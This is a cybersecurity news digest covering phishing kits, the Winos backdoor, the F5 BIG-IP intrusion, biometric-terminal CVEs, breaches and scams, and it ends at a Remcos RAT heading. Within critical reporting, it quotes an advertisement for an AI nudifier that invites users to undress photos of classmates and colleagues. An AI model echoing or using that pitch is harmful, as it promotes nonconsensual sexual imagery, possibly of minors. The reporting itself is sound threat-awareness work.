Researchers have assessed that the ONNX Store phishing kit is likely a rebranding of the Caffeine phishing kit. This assessment is based on significant overlaps in infrastructure and on advertising in the same Telegram channels. This overlap includes the involvement of the Arabic-speaking threat actor MRxC0DER as the likely developer and maintainer of the Caffeine kit.
[Image source: blog.eclecticiq.com]
The rebranding of the platform appears to be focused on improving operational security for malicious actors. The ONNX Store service lets threat actors control operations through Telegram bots, with an additional support channel to assist clients, rather than through a single web server. This shift in infrastructure and management makes it more challenging to take down the platform's phishing domains. To further increase its resilience, ONNX Store uses Cloudflare services to delay the removal of its phishing domains. This abuse of Cloudflare's CAPTCHA feature and IP proxy helps attackers avoid detection by phishing web crawlers and URL sandboxes. The practice also hides the original host and makes it more difficult to take down phishing domains. Advertised with slogans like "Anything is allowed" and "Ignore all reports of abuse", these services are designed to support a wide range of illegal activities without the risk of being blocked, creating a safe haven for cybercriminals.
New Threat Group Void Arachne Targets Chinese-Speaking Audience; Promotes AI Deepfake and Misuse
Void Arachne Tactics
Researchers from Trend Micro discovered that the Void Arachne group employs multiple techniques to distribute malicious installers, including search engine optimization (SEO) poisoning and posting links on Chinese-language Telegram channels.
- SEO Poisoning: The group set up websites posing as legitimate software download sites. Through SEO poisoning, they pushed these sites to rank highly on search engines for common Chinese software keywords. The sites host MSI installer files containing Winos malware bundled with software like Chrome, language packs, and VPNs. Victims unintentionally infect themselves with Winos while believing that they are only installing the intended software.
- Targeting VPNs: Void Arachne frequently targets Chinese VPN software in their installers and Telegram posts. Exploiting interest in VPNs is an effective infection tactic, as VPN usage is high among Chinese internet users due to government censorship. (Image source: trendmicro.com)
- Telegram Channels: In addition to SEO poisoning, Void Arachne shared malicious installers in Telegram channels focused on Chinese language and VPN topics. Channels with tens of thousands of users pinned posts with infected language packs and AI software installers, increasing exposure.
- Deepfake Pornography: A concerning discovery was the group promoting nudifier apps generating nonconsensual deepfake pornography. They advertised the ability to undress photos of classmates and colleagues, encouraging harassment and sextortion. Infected nudifier installers were pinned prominently in their Telegram channels.
- Face/Voice Swapping Apps: Void Arachne also advertised voice changing and face swapping apps enabling deception campaigns like virtual kidnappings. Attackers can use these apps to impersonate victims and pressure their families for ransom. As with nudifiers, infected voice/face swapper installers were shared widely on Telegram.
Winos 4.0 C&C Framework
The threat actors behind the campaign ultimately aim to install the Winos backdoor on compromised systems. Winos is a sophisticated Windows backdoor written in C++ that can fully take over infected machines. The initial infection begins with a stager module that decrypts malware configurations and downloads the main Winos payload. Campaign operations involve encrypted C&C communications that use generated session keys and a rolling XOR algorithm. The stager module then stores the full Winos module in the Windows registry and executes shellcode to launch it on affected systems.
[Image source: trendmicro.com]
Winos grants remote access, keylogging, webcam control, microphone recording, and distributed denial of service (DDoS) capabilities. It also performs system reconnaissance such as registry checks, file searches, and process injection. The malware connects to a command and control server to receive further modules and plugins that expand its functionality. Several of these external plugins were observed collecting saved passwords from programs like Chrome and QQ, deleting antivirus software and adding themselves to startup folders.
Concerning Trend of AI Misuse and Deepfakes
Void Arachne demonstrates technical sophistication and knowledge of effective infection tactics through its use of SEO poisoning, Telegram channels, AI deepfakes, and voice/face swapping apps. One particularly concerning trend observed in the Void Arachne campaign is the mass proliferation of nudifier applications that use AI to create nonconsensual deepfake pornography. These images and videos are often used in sextortion schemes for further abuse, victim harassment, and financial gain. An English translation of a message advertising the nudifier AI uses the word "classmate," suggesting that one target market is minors:

"Just have appropriate entertainment and satisfy your own lustful desires. Do not send it to the other party or harass the other party. Once you call the police, you will be in constant trouble! AI takes off clothes, you give me photos and I will make pictures for you. Do you want to see the female classmate you yearn for, the female colleague you have a crush on, the relatives and friends you eat and live with at home? Do you want to see them naked? Now you can realize your dream, you can see them naked and lustful for a pack of cigarette money."
[Image source: trendmicro.com]
Additionally, the threat actors have advertised AI technologies that could be used for virtual kidnapping, a novel deception campaign that leverages AI voice-altering technology to pressure victims into paying a ransom. The promotion of this technology for deepfake nudes and virtual kidnapping is the latest example of the danger of AI misuse.
CISA Releases Guide on Modern Approaches to Network Access Security
Vulnerabilities in Traditional VPN Systems
CISA has identified several vulnerabilities in legacy VPN systems that can enable broad network compromise if exploited, given their typical lack of granular access controls. While VPNs make it easy for employees to connect to remote company applications and external data servers, they also make organizations more susceptible to compromise through various vulnerabilities inherent to typical network design. Recent examples of successful exploitation of VPNs include:
- Vulnerabilities affecting Ivanti Connect Secure gateways (CVE-2023-46805, CVE-2024-21887, and CVE-2024-21893) allowed threat actors to reverse tunnel from the VPN device, hijack sessions, and move laterally across victim networks while evading detection.
- The Citrix Bleed vulnerability (CVE-2023-4966) enabled bypassing of multifactor authentication, allowing threat actors to impersonate legitimate users, harvest credentials, and conduct ransomware attacks.
Modern Solutions to Network Access Security
Modern alternatives to VPN-based network access control include zero trust architecture, SSE, SASE and identity-based adaptive access policies. These solutions grant access to applications and services based on continuous, granular validation of user identity and authorization, rejecting requests that are not explicitly authenticated for the specific resource. Zero Trust is a collection of concepts and ideas that help organizations enforce accurate per-request access decisions based on the principle of least privilege. SSE is a comprehensive approach that combines networking, security practices, policies and services within a single platform. Key capabilities like multi-factor authentication, endpoint security validation, and activity monitoring better secure data in transit while reducing attack surfaces. Tighter access controls also help secure data at rest by limiting exposure of internal applications. Effectiveness relies heavily on aligning network and infrastructure with zero trust principles like least privilege. Implementing zero trust even partially can greatly enhance protection against threats and data loss.
ViLe: Two Men Plead Guilty For Hacking Into Law Enforcement Portal and Threatening Victim
Breach and Abuse of Federal Law Enforcement Portal
According to the press release, on May 7, 2022, Singh used a stolen password belonging to a police officer to access a non-public, password-protected federal law enforcement portal. The portal, maintained by the U.S. Drug Enforcement Administration (DEA), holds detailed records on narcotics and currency seizures as well as law enforcement intelligence reports shared with state and local agencies.
[Image source: archive.org]
The next day, Singh told Ceraolo in an online chat that he shouldn’t have accessed the portal and was “no gov official.” Ceraolo then shared the stolen login credentials with others in the ViLe hacking group. Shortly after, Singh used the database to obtain personal information on an individual. He messaged the victim, referred to in court documents as Victim-1, threatening to harm their family if they did not provide login credentials to their Instagram accounts. To prove he had access to sensitive information, Singh included Victim-1’s Social Security number, driver’s license number and home address. He told Victim-1 that through the database portal, “i can request information on anyone in the US doesn’t matter who, nobody is safe.” Singh instructed Victim-1 to sell access to the Instagram accounts and give him the money. His messages implied he would use the information to harm Victim-1’s parents if the demands were not met.
[Image source: dea.gov]
While the court documents focus on the case of Victim-1, the duo also threatened other individuals whose information they had access to for financial gain. According to an earlier report from Vice, the portal used by the duo is the EPIC (El Paso Intelligence Center) Portal.
Guilty Pleas Over Actions
Singh and Ceraolo were charged in March 2023 with computer intrusion conspiracy and aggravated identity theft. Singh pleaded guilty to both counts on June 17, while Ceraolo had done so on May 30, the U.S. Attorney’s Office for the Eastern District of New York announced. U.S. Attorney Breon Peace condemned the men’s actions as “ViLe,” a reference to the hacking group’s disturbing logo depicting a hanging girl. He stated, “They hacked into a law enforcement database and had access to sensitive personal information, then threatened to harm a victim’s family and publicly release that information unless the defendants were ultimately paid money. Our Office is relentless in protecting victims from having their sensitive information stolen and used to extort them by cybercriminals.” He thanked the HSI's El Dorado Task Force, the Federal Bureau of Investigation and the New York Police Department for assistance in the case. HSI New York Special Agent in Charge Ivan J. Arvelo stated, “The defendants, along with their co-conspirators, exploited vulnerabilities within government databases for their own personal gain. These guilty pleas send a strong message to those that would seek illicit access to protected computer systems." He added, "HSI New York's El Dorado Task Force will continue to work with law enforcement partners to uncover evidence until every member of the ViLe group and similar criminal organizations are brought to justice.” The defendants face two to seven years in federal prison upon sentencing on the charges of conspiring to commit computer intrusion and aggravated identity theft.
NHS Dumfries and Galloway Warns Affected Individuals of Data Breach After Refusing to Pay Ransom to Cybercriminals
NHS Dumfries and Galloway Breach
NHS Dumfries and Galloway’s computer systems were breached by hackers in February 2024. The threat actors accessed and copied confidential patient data including X-rays, test results and communications between health care providers and patients. However, the stolen data was not deleted or altered on NHS systems, and patient care has not been impacted.
[Image source: nhsdg.co.uk]
On May 6, the criminals made good on threats to publish the data online after NHS Dumfries and Galloway did not meet undisclosed demands. The leaked data includes millions of small, individual files on NHS patients. Authorities said they are prioritizing notifications to vulnerable patient groups that may be at higher risk due to the breach. NHS Dumfries and Galloway has been working alongside national agencies such as Police Scotland, the National Crime Agency, the National Cyber Security Centre and the Scottish Government for advice and direction in investigating the incident. "On behalf of NHS Dumfries and Galloway, I would like to apologise for the anxiety which may have been caused to you due to this situation. We have sought to be as open as possible while adhering to the very explicit guidance we have received from Police Scotland and partner agencies," stated Julie White, Chief Executive of NHS Dumfries and Galloway.
Risks and Recommendations
The Chief Executive of NHS Dumfries and Galloway stated that patients should assume some of their personal data was likely copied and published. The health authority identified potential risks including identity theft, extortion attempts and anxiety stemming from the data breach. Patients are advised to remain vigilant. The NHS recommends that patients refrain from opening suspicious emails, clicking unknown links or providing personal information over the phone to unverified parties. Suspicious communications should be reported to Police Scotland immediately. The health authority also advises patients to update their passwords frequently and to make them as strong as possible. A helpline and website have been set up to provide information and support relating to the cyberattack. Psychological services are available for those experiencing anxiety regarding stolen personal data. The criminal investigation remains ongoing, and the health board is working alongside technology partners to secure NHS systems against future attacks. Patients with additional questions can visit www.nhsdg.co.uk/cyberattack or call the helpline at 01387 216 777, open 9 a.m. to 6 p.m. weekdays and 9 a.m. to 1 p.m. Saturdays.
Chinese Hackers Compromised Large Organization’s F5 BIG-IP Systems for 3 Years
Velvet Ant Campaign Used Evasive Tactics
Researchers from Sygnia disclosed that the attack began with the compromise of the organization's internet-facing F5 BIG-IP appliances, which were running vulnerable OS versions. These appliances usually occupy a trusted position within the network architecture, giving an attacker who controls them significant influence over network traffic while evading most forms of detection. Within the organization, the appliances managed its firewall, WAF (web application firewall), load balancing, and local traffic.
[Image source: sygnia.co]
The attackers used known remote code execution flaws to install custom malware on the compromised F5 appliances. To obscure the execution chain, they manipulated file-creation times and used three different files (‘iviewers.exe’, ‘iviewers.dll’ and ‘iviewers.dll.ui’) to deploy the PlugX malware on affected systems. Once installed, PlugX harvested credentials and executed reconnaissance commands to map the internal network. The hackers then used the open-source tool Impacket for lateral movement across the network.
[Image source: sygnia.co]
During the initial compromise, the threat actor compromised both modern workstations and legacy Windows Server 2003 systems. On modern endpoints, the hackers routinely tampered with the installed antivirus before deploying additional tools. This careful targeting of security controls demonstrates Velvet Ant’s operational maturity, and the focus on legacy platforms, where such controls were weaker, ultimately helped the hackers evade detection. The researchers identified four additional malware programs placed on the compromised F5 appliances:
- VELVETSTING - This program was configured to connect to a remote server located in China to check for encoded commands on an hourly basis. Once commands were received, the program would execute them via a Unix shell.
- VELVETTAP - This malware appears to have monitored and captured data from the F5 internal network interface.
- SAMRID - This software has been identified as a publicly available tunneling program previously used by Chinese state-sponsored groups. While dormant during the researchers' investigation, it may have provided the attackers with remote access.
- ESRDE - This backdoor works similarly to VELVETSTING, running commands delivered from an external server. It was also inactive at the time of analysis.
Organization's Systems Were Reinfected Upon Malware Removal
After an extensive incident response operation had apparently eliminated the threat actor’s access, researchers detected a PlugX reinfection on cleaned hosts a few days later. Further analysis found that the new version of PlugX lacked an external command and control server. Instead, the malware was configured to use an internal file server for command and control. This adaptation blended malicious traffic with normal internal communications, helping Velvet Ant operate undetected. While the attack was eventually contained, its sophistication and persistence highlight the challenges defenders face against advanced persistent threats (APTs). The researchers stated that they could not rule out the possibility that the campaign was a ‘false-flag’ operation by a different APT group. However, the PlugX malware has previously been associated with other China-linked APTs. The researchers have shared several recommendations as well as indicators of compromise (IOCs) on their blog.
Globe Life Discloses Breach Amid Accusations of Fraud and Shady Business Tactics
Globe Life Breach Discovery and Containment
According to Globe Life's filing with the SEC, the company had conducted a security review on one of its web portals to discover potential vulnerabilities that may have affected its access permissions and user identity management. The investigation was prompted by a legal inquiry from a state insurance regulator on June 13, 2024. The review revealed that an unauthorized party may have accessed the company's web portal, compromising sensitive customer and policyholder data. The company stated that it had immediately revoked external access to the affected portal upon breach discovery. Globe Life said that at this stage, it believes the security issue is isolated to the one web portal. All other company systems remain fully operational. Globe Life added that it expected minimal impact to its business operations after the take down of the affected web portal. The company has activated its cybersecurity incident response plan and engaged external forensics experts to investigate the breach's scope. In its SEC filing, Globe Life disclosed that the investigation remains ongoing. The full impact and nature of the incident are unclear at the moment.Incident Comes After Scrutiny Over Business Tactics
The company said it has yet to determine whether the breach qualifies as a reportable cybersecurity incident under the SEC's disclosure rules. The disclosure comes amid increasing scrutiny and financial setbacks suffered by the company. The Texas-based insurer has faced allegations of fraudulent sales tactics and other business and workplace improprieties. The short sellers Fuzzy Panda Research and Viceroy Research made these allegations public in April 2024. While the company has continued to deny these claims, its share price has dropped by 24% since the publication of the Fuzzy Panda report. The reports claimed that Globe Life and its biggest subsidiary, American Income Life (AIL), had engaged in insurance fraud, framing of policies for dead and fictitious individuals, withdrawal of consumer funds without approval, unfair dismissal, misleading sales tactics and illegal kickbacks. They also alleged that some of AIL's most profitable agents had faced accusations of kidnapping, assault and child grooming from defendants, witnesses and plaintiffs. It remains unclear whether the state insurance regulator contact that led to the breach discovery is related to these allegations. Insurers like Globe Life are regulated at the state level rather than the federal level.
UK, US and Canada Accuse Russia of Plot to Interfere With Elections in Moldova
Kremlin Actors Seeking to Discredit Moldova's Leaders
According to a statement from the U.S. Embassy in Russia, Russian threat actors are aggressively distributing propaganda to “foment negative public perceptions” of President Sandu. This involves fabricating electoral irregularities while also aiming to incite protests if the incumbent president is re-elected. The plot dates back years, with the Kremlin providing support to fugitive Moldovan businessman Ilan Shor. Shor had previously been sentenced to 15 years in prison in connection with the disappearance of $1 billion from Moldovan banks in 2014. All three countries have sanctioned Shor for his connection to the incident. The statement singled out Russian state-television channel RT for providing several years of support to Shor. The UK, US and Canada claim they have already shared detailed evidence with Moldovan authorities to enable further investigation and disruption. They also state they will continue backing Moldova with a range of support measures as it deals with Russian interference and fallout from the Ukraine war.
All Three Countries Announce Support at G7 Summit
The three nations expressed confidence in Moldova's ability to manage these threats linked to Russian interference. They have taken several measures to support Moldova's efforts, including:
- Sharing detailed information with Moldovan partners to investigate, thwart, and put a stop to the Kremlin's plans.
- Increasing accountability and punishment for individuals and entities involved in covertly financing political activities in Moldova through sanctions and potential further actions.
- Strongly supporting Moldova's democratic, economic, security, and anti-corruption reforms, as well as its deepening European integration.
Russia Is a Threat to Election Security: Researchers
An earlier report from Mandiant in April suggested that Russia presented the biggest threat to election security in the United States, United Kingdom and European Union. “Multiple Russian groups have targeted past elections in the U.S., France, and Ukraine, and these groups have continued to demonstrate the capability and intent to target elections both directly and indirectly,” the report stated. Experts also fear Russian attempts at spreading disinformation or influencing public opinion on non-election events such as the upcoming 2024 Summer Olympics in Paris.
Fraudsters Have Been Creating Websites Impersonating the Official Olympics Ticketing Website
Website Incorporates Official Paris 2024 Summer Olympic Games Branding
The 'paris24tickets[.]com' website appeared professional and legitimate at first glance. The site advertised itself as a “secondary marketplace for sports and live events tickets,” and was displayed as the second result among sponsored Google search results for 'paris 2024 tickets.' It allowed visitors to browse upcoming Olympic events, select event-specific tickets, and enter payment information. Its polished design resembled that of trusted ticketing platforms, as well as the official Olympics ticket purchase site. Proofpoint researchers warned that the website was entirely fraudulent despite its authentic look and feel. The site was likely collecting users’ financial and personal information rather than actually processing ticket orders. The researchers acted swiftly to have the misleading domain suspended upon its discovery.
Figure: Impersonating domain 'paris24tickets[.]com' (Source: archive.org)
Figure: Official Olympics Ticketing Site (Source: https://tickets.paris2024.org)
The researchers noticed that in some cases the scammers even sent emails promising "discounts" on coveted tickets to victims. This tactic was likely intended to lure unsuspecting individuals who may have been desperate to secure tickets at lower cost. Victims who provided their personal or financial information on the fraudulent website risk having their identities and money stolen. The scammers behind these websites may also collect important personal data, such as names, contact information, and credit card details, for sale or for further malicious campaigns.
French Gendarmerie Nationale Reported the Discovery of 338 Scam Sites
The 'paris24tickets[.]com' website represents just a tiny fraction of a much broader network of fraudulent Olympics domains. The French Gendarmerie Nationale had identified approximately 338 such websites since March 2023 and made subsequent efforts to shut them down; 51 of these sites were stated to have been closed, while 140 of them were put on notice. The fraudsters behind these scams likely rely on sponsored search engine ads and targeted emails to drive traffic to the impersonating websites. Offers of special deals and discounts are further lures to draw in potential victims. 200 French gendarmes had been mobilized as a distinct unit to monitor the internet and various social networks for Olympics ticketing-related fraud and mass resales, under the direction of Europol. These units work alongside the DGCCRF (Directorate General for Consumer Affairs, Competition and Fraud Prevention) in France. Captain Etienne Lestrelin, director of operations at the unit, told France Info radio that social media such as Facebook, Leboncoin, Telegram and Instagram were often “the primary source of resale attempts.” He added, “This is an exchange from individual to individual. Except that the buyer does not know if the person really owns the tickets, since they are virtual tickets, not paper tickets. So people are selling you wind; we don't know what they're selling.” Lestrelin advised that tickets sold at too low a price should alert potential buyers: “You will never have a ticket below its original cost. The goal of people who were able to buy tickets in volume and with the intention of reselling them is to make a profit. So it is an alert if you find a much cheaper ticket. The sentence to remember is that there are no very good deals on the internet; it's not possible.”
He explained that it was also not possible to own a ticket before the event begins and the QR codes are generated. Anyone who claims to be currently in possession of a ticket, or who holds tickets that seem visually legitimate, is still a fraudster. He warned buyers to be vigilant about buying such tickets outside of official sources, because doing so can itself be an offense. "You are associating yourself with the offense that the seller commits when he resells without going through the official website. This is a criminal offense," he stated. To validate purchases, buyers can cross-check the references they are given with the official Paris 2024 Summer Olympic Games application. Buyers who suspect that they may have been duped can report to a police station, a gendarmerie or the DGCCRF. Legitimate ticket purchases can be made through the official ticketing website or the official sub-distributor network.
Baw Baw Shire Residents Impacted By OracleCMS Breach That Hit Several Major Cities in Australia
Over 1,200 Baw Baw Shire Residents Affected
The exposed information includes customer contact details and call notes dating from June 2014 to January 2016, when customers rang the council hotline during evenings, weekends and holidays. Calls made during that period had been automatically forwarded to OracleCMS call agents. It remains unclear precisely how the contractor failed to protect confidential constituent information, or when the company first discovered the breach. Upon learning of the breach earlier this month, Baw Baw officials urgently contacted every affected resident (over 1,250 in total) through SMS messages, and through personal calls to vulnerable groups such as the elderly. While the breach did not directly affect the council's own systems, it represents an alarming security gap at a third-party vendor that had been given access to constituents' sensitive information.
OracleCMS Provider Implicated in Other Breaches
Authorities are currently investigating the incident, which may have also impacted other clients of the Australia-based company. OracleCMS provides outsourced contact center services to an array of local governments and organizations, and had previously been implicated in a long list of data breaches affecting several different cities in Australia. According to some official press release statements, OracleCMS appeared to initially downplay the incident. An earlier release from Merri-bek City Council stated: "OracleCMS informed Council in April that there had been a cyber security incident where identifiable information of customers had been compromised. Until last week we were informed that Council’s customer data was not involved. Council has now been informed that the OracleCMS data breach does include records of calls handled by OracleCMS on Council’s behalf. We take the privacy of our customers very seriously and we are taking urgent action to address this issue." The OracleCMS data breach also affected several businesses, including entities belonging to Nissan in the Australia and New Zealand region, such as Nissan Financial Services Australia Pty Ltd, Nissan Motor Co. Pty Ltd, Nissan Financial Services, New Zealand Pty Ltd and Nissan New Zealand Ltd.
OracleCMS subsequently suffered a data breach, which it was alerted to on 15 April 2024. This separate incident resulted in certain data held by OracleCMS, including the summary information Nissan provided to OracleCMS, being compromised and published on the dark web.
As cyberattacks surge, some have questioned whether outsourcing critical customer service channels renders individuals and businesses more vulnerable to data theft. The incident serves as a reminder for governments and organizations to lock down vulnerabilities present in third-party vendors or tools while conducting regular security audits. Residents with concerns regarding the breach may contact Baw Baw Shire Council’s customer service line at +61 3 5624 2411.
Canada’s Largest District School Board Investigates Ransomware Incident
Toronto District School Board's Investigation Underway
The school board stated that the incident had affected its testing environment, which is used to evaluate new technology and programs before they are deployed on its systems. The board's cybersecurity team had taken immediate action upon discovering the incident, securing systems and preserving data. The Toronto District School Board had notified the Toronto police and the Information and Privacy Commissioner of Ontario of the incident. In its letter of notification sent to parents and guardians, the Toronto District School Board stated that it had launched an investigation with the aid of third-party experts to fully assess the nature and scope of the incident, including any potential compromise of its networks or breach of sensitive personal information. The letter added, "If it is determined that any personal information has been impacted, we will provide notice to all affected individuals. We understand that news of a cyber incident is concerning, but please know that we are doing everything possible to learn more about what occurred and address this situation."
Impact Unknown; More Details Expected Soon
Despite the attack, the district school board's systems remained fully operational. While only the board's testing environment had been affected, Humber College cybersecurity expert Francis Syms remained concerned about the incident, as personal information is sometimes used in test environments. He added that test environments are usually not secured by multifactor authentication, potentially making their data easier to access. However, he acknowledged that he was not aware of which testing system was being used, as he was not part of the investigation team. The Toronto District School Board did not clarify whether the testing environment or its data contained any personal information. Ryan Bird, a spokesperson for the school board, told CityNews Toronto that the full extent of the breach was unknown, as was whether any personal data had been compromised in the attack, but that further details would be revealed by the end of the day. The Cyber Express team has reached out to the Toronto District School Board for further details and investigation results, but no response has been received as of yet. Toronto's cybersecurity defenders have observed an uptick in cyberattacks in recent years, from both financially motivated hackers and 'hacktivists' disrupting public systems. Some attacks occur during sensitive times such as elections, global conflicts, or visits by foreign leaders. However, ransomware attacks remain the most common form of attack. City officials have been working with several agencies to rebuild trust in the safety of public systems and services.
Charles Finlay, a Toronto resident and executive director at Rogers Cybersecure Catalyst, had earlier told the Toronto Star, “I think the city has to be more forthcoming about what it is doing to ensure that those services are secure from cyber-attacks.” The city has witnessed several attacks on its public institutions, such as a Cl0p ransomware intrusion into the City of Toronto's computer systems and an attack last year on the Toronto Public Library's computer systems.
CISA Warns of Phone Scammers Impersonating Its Employees
CISA Impersonation Scam
The scammers behind the campaign make phone calls to victims in which they claim to be contacting targets on behalf of CISA; they then ask victims to share personal information or money under the guise of protecting their accounts from unauthorized activity. Fraudsters may also direct victims to download additional software or click on links to "verify" their identity. However, CISA confirmed that it would never make such demands. "CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret," CISA warned. Possible red flags to watch out for:
- Unsolicited phone calls that claim to be from CISA.
- Callers requesting personal information, such as passwords, social security numbers, or financial information.
- Callers demanding payment or transfer of money to "protect" your account.
- Callers creating a sense of urgency or pressuring you to take immediate action.
- Do not pay the caller.
- Keep a record of the numbers used.
- Hang up immediately and ignore further calls from suspicious numbers.
- Report the scam to CISA by calling (844) SAY-CISA (844-729-2472).
FTC Observes Uptick in Impersonation Scams
The CISA impersonation scam is a recent example of the rise in impersonation fraud targeting both businesses and government agencies. According to the latest data from the Federal Trade Commission (FTC), the number of such scams has increased dramatically in recent years, and they cost consumers more than $1.1 billion in 2023 alone. The FTC report showed that in 2023, the agency received more than 330,000 reports of fraud posing as a business and almost 160,000 reports of fraud posing as a government agency. Collectively, these incidents account for almost half of all fraud cases reported directly to the FTC. "The financial injury is breath-taking – and cash-taking," the FTC quipped in its Spotlight. It further added, "Reported losses to impersonation scams topped $1.1 billion in 2023, more than three times what consumers reported in 2020." While fraudsters employ various types of scams, the FTC noted that the following types accounted for nearly half of the scams reported in 2023:
- Copycat account security alerts: Scams impersonating legitimate services such as Amazon that purport to be about unauthorized activity or charges on the target's account.
- Phony subscription renewals: Usually email notices that alert targets of auto-renew charges to various online services.
- Fake giveaways, discounts, or money to claim: Fake rewards or winnings that claim to originate from legitimate providers such as internet providers or large retailers.
- Bogus problems with the law: Scammers try to deceive targets into believing that their identity has been used to commit serious crimes such as money laundering or drug smuggling.
- Made-up package delivery problems: Messages that alert you of fake delivery problems with legitimate delivery services such as the U.S. Postal Service, UPS, or FedEx.
Researchers Discovered 24 Vulnerabilities in ZKTeco Biometric Terminals Used In Nuclear Plants
Vulnerabilities in ZKTeco Biometric Terminals
Biometric terminals see multiple uses aside from their primary purpose of acquiring biometric data such as fingerprints, voices, facial features, or irises. They can be connected to other scanners to support alternative authentication methods, or be deployed as a means of ensuring employee productivity or reducing fraud. These devices are increasingly used in confidential facilities such as power plants, executive suites or server rooms. ZKTeco biometric terminals support facial recognition (with the ability to store thousands of face templates), password entry, electronic passes, and QR codes. Researchers conducted several tests to assess the security and reliability of these devices, finding 24 different vulnerabilities that could be exploited by threat actors in real attack scenarios against confidential facilities:
- 6 SQL injection vulnerabilities
- 7 stack buffer overflow vulnerabilities
- 5 command injection vulnerabilities
- 4 arbitrary file write vulnerabilities
- 2 arbitrary file read vulnerabilities
- Physical bypass via fake QR codes: CVE-2023-3938 allows cybercriminals to perform a SQL injection attack by injecting malicious code into access strings. This could allow them to gain unauthorized entry to restricted areas.
- Biometric data theft and backdoor deployment: The CVE-2023-3940 and CVE-2023-3942 vulnerabilities could give attackers access to sensitive user data and password hashes stored on the device. Additionally, CVE-2023-3941 could allow them to remotely alter device databases, potentially adding unauthorized individuals to the system or creating a backdoor.
- Remote code execution: The CVE-2023-3939 and CVE-2023-3943 flaws enable the execution of arbitrary commands or code on the device, effectively giving attackers full control and the ability to launch further attacks on the wider network.
“The impact of the discovered vulnerabilities is alarmingly diverse. To begin with, attackers can sell stolen biometric data on the dark web, subjecting affected individuals to increased risks of deepfake and sophisticated social engineering attacks. Furthermore, the ability to alter the database weaponizes the original purpose of the access control devices, potentially granting access to restricted areas for nefarious actors. Lastly, some vulnerabilities enable the placement of a backdoor to covertly infiltrate other enterprise networks, facilitating the development of sophisticated attacks, including cyberespionage or sabotage. All these factors underscore the urgency of patching these vulnerabilities and thoroughly auditing the device's security settings for those using the devices in corporate areas.”
Mitigating Risks to Biometric Terminals
The researchers stated that they had disclosed all information about the discovered vulnerabilities to ZKTeco, but had no information on whether the vulnerabilities had been patched. In the meantime, they have shared the following recommendations to protect these biometric terminals from attack:
- Isolate biometric reader usage into a separate network segment.
- Employ robust administrator passwords and change default ones.
- Audit and fortify the device's security settings, including enabling temperature detection.
- If feasible, minimize the use of QR code functionality.
- Regularly update the device's firmware.
City of Moreton Bay Investigates Data Breach After Resident Discovered Leak of Private Information
Data Breach Discovered By Local Resident
City of Moreton Bay resident Piper Lalonde, who works as a data analyst, discovered the breach along with her husband. They were shocked to learn that their personal information was freely available on the council's online customer request portal. The couple found that the exposed information included their phone numbers, complaints, and requests they had made for new bins, along with the GPS coordinates of where the requests had been filed. After conducting a further search, they found that the personal information of some of their friends and neighbors, who were fellow ratepayers, was also available in the records. Piper reported this to the council, and the website was taken down the next day. However, she remained unsatisfied with the lack of notification about the incident to impacted residents. Piper stated, "I would expect they'd have to send out some formal communication letting people know their information was publicly accessible, but there was no indication they were going to do that." She expressed concern about the possibility of people stumbling upon complaints made about them by other residents. She added, "If this gets in the wrong hands — it just takes one person to see a complaint about them, and who knows what they'll do."
City of Moreton Bay Response to Data Breach
After Piper's report, the website was said to have been taken down. The site appears to be functional again as of now, with some functions still limited, and it displays an official notice in response to the incident: "We are experiencing system difficulties with our customer request portal. Our third-party provider is investigating a possible information breach. The cause is yet to be determined but there is no indication this is a cyber attack. We will never contact you via unsolicited calls to request sensitive information. No action is required from you at this stage. We will continue to keep you informed." The notice appears to indicate that the breach stemmed from a third-party provider. The Cyber Express team has reached out to the Moreton Bay Council's Privacy Officer for further information on the breach; however, no response had been received as of publication time. The potential scale of the data breach, as well as its impact on residents, is currently unknown. It is also unclear how many individuals may have accessed the available data before the website was temporarily taken down and subsequently limited.
Apple Launches ‘Private Cloud Compute’ Along with Apple Intelligence AI
Private Cloud Compute Aims to Secure Cloud AI Processing
Apple has stated that its new Private Cloud Compute (PCC) is designed to enforce privacy and security standards over AI processing of private information. "For the first time ever, Private Cloud Compute brings the same level of security and privacy that our users expect from their Apple devices to the cloud," said an Apple spokesperson. At the heart of PCC is Apple's stated commitment to on-device processing. "When Apple is responsible for user data in the cloud, we protect it with state-of-the-art security in our services," the spokesperson explained. "But for the most sensitive data, we believe end-to-end encryption is our most powerful defense." Despite this commitment, Apple has stated that more sophisticated AI requests require Apple Intelligence to use larger, more complex models in the cloud. This presented a challenge to the company, as traditional cloud AI security models were found lacking in meeting its privacy expectations. Apple stated that PCC is designed with several key features to ensure the security and privacy of user data, claiming the following:
- Stateless computation: PCC processes user data only for the purpose of fulfilling the user's request, and then erases the data.
- Enforceable guarantees: PCC is designed to provide technical enforcement for the privacy of user data during processing.
- No privileged access: PCC does not allow Apple or any third party to access user data without the user's consent.
- Non-targetability: PCC is designed to prevent targeted attacks on specific users.
- Verifiable transparency: PCC provides transparency and accountability, allowing users to verify that their data is being processed securely and privately.
Apple Invites Experts to Test Standards; Online Reactions Mixed
At this week's Apple Annual Developer Conference, Apple's CEO Tim Cook described Apple Intelligence as a "personal intelligence system" that could understand and contextualize personal data to deliver results that are "incredibly useful and relevant," making "devices even more useful and delightful." Apple Intelligence mines and processes data across apps, software and services on Apple devices. This mined data includes emails, images, messages, texts, documents, audio files, videos, contacts, calendars, Siri conversations, online preferences and past search history. The new PCC system attempts to ease consumer privacy and safety concerns. In its description of 'Verifiable transparency,' Apple stated: "Security researchers need to be able to verify, with a high degree of confidence, that our privacy and security guarantees for Private Cloud Compute match our public promises. We already have an earlier requirement for our guarantees to be enforceable. Hypothetically, then, if security researchers had sufficient access to the system, they would be able to verify the guarantees." However, despite Apple's assurances, the announcement of Apple Intelligence drew mixed reactions online, with some already likening it to Microsoft's Recall. In reaction to Apple's announcement, Elon Musk took to X to announce that Apple devices may be banned from his companies, citing the integration of OpenAI as an 'unacceptable security violation.' Others have also raised questions about the information that might be sent to OpenAI. According to Apple's statements, requests made on its devices are not stored by OpenAI, and users’ IP addresses are obscured.
Apple stated that it would also add “support for other AI models in the future.” Andy Wu, an associate professor at Harvard Business School who researches the use of AI by tech companies, highlighted the challenges of running powerful generative AI models while limiting their tendency to fabricate information: “Deploying the technology today requires incurring those risks, and doing so would be at odds with Apple’s traditional inclination toward offering polished products that it has full control over.”
South Korean Researchers Observe Remcos RAT Distributed Through Fake Shipping Lures
Use of UUEncoding (UUE) Files to Distribute Remcos RAT Malware
